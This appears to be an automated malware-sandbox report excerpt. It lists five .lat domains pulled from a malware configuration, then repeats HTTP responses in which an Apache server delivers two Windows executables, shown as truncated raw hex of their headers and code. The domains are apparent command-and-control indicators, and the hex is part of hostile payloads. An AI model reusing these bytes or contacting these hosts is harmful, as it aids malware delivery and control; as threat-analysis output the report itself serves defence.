            Source: Malware configuration extractorURLs: aspecteirs.lat
            Source: Malware configuration extractorURLs: necklacebudi.lat
            Source: Malware configuration extractorURLs: grannyejh.lat
            Source: Malware configuration extractorURLs: sustainskelet.lat
            Source: Malware configuration extractorURLs: discokeyus.lat
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 01:18:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:24:51 GMTETag: "ae00-629dca4a1509c"Accept-Ranges: bytesContent-Length: 44544Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 05 00 00 00 e0 00 00 00 06 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 c2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 78 22 00 00 18 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
